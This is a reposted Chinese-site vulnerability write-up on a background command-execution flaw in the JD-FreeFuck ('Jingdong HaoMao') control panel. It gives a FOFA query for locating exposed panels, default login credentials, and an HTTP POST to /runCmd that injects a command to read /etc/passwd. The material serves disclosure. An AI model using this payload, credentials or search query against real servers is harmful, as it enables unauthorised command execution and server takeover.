当前位置:网站首页>JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
2022-04-23 18:05:00 【Lonely and lazy deed】
Vulnerability description
i
JD-FreeFuck There is a background Command Execution Vulnerability , Because the content is not filtered when the command is executed by passing parameters , Causes arbitrary commands to be executed , Control server Project address : https://github.com/meselson/JD-FreeFuck
Holes affect
s
JD-FreeFuck
Space mapping
d
FOFA:title=" Jingdong HaoMao control panel "
Loophole recurrence
- After visiting, the login page is as follows
- Default account
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
Personal blog
Lonely and lazy deed :https://gylq.gitee.io/time
版权声明
本文为[Lonely and lazy deed]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html
边栏推荐
- C byte array (byte []) and string are converted to each other
- GDAL + ogr learning
- Amount input box, used for recharge and withdrawal
- Rust: a simple example of TCP server and client
- Svn simple operation command
- 2022 Jiangxi Photovoltaic Exhibition, China Distributed Photovoltaic Exhibition, Nanchang Solar Energy Utilization Exhibition
- 读取excel,int 数字时间转时间
- .105Location
- Eigen learning summary
- Refcell in rust
猜你喜欢
Auto.js 自定义对话框
Welcome to the markdown editor
How to install jsonpath package
2022江西光伏展,中国分布式光伏展会,南昌太阳能利用展
cv_ Solution of mismatch between bridge and opencv
Jenkspy package installation
Random number generation of C #
Summary of floating point double precision, single precision and half precision knowledge
.104History
Re expression régulière
随机推荐
Go的Gin框架学习
Generate verification code
C byte array (byte []) and string are converted to each other
Gobang game based on pyGame Library
Multi thread safe reference arc of rust
Remember using Ali Font Icon Library for the first time
Svn simple operation command
2022江西光伏展,中国分布式光伏展会,南昌太阳能利用展
Submit local warehouse and synchronize code cloud warehouse
C network related operations
Docker 安装 Redis
Qtablewidget usage explanation
ArcGIS table to excel exceeds the upper limit, conversion failed
What are the relationships and differences between threads and processes
线上怎么确定期货账户安全的?
Jenkspy package installation
Crawl the product data of Xiaomi Youpin app
.105Location
cv_ Solution of mismatch between bridge and opencv
C1 notes [task training chapter I]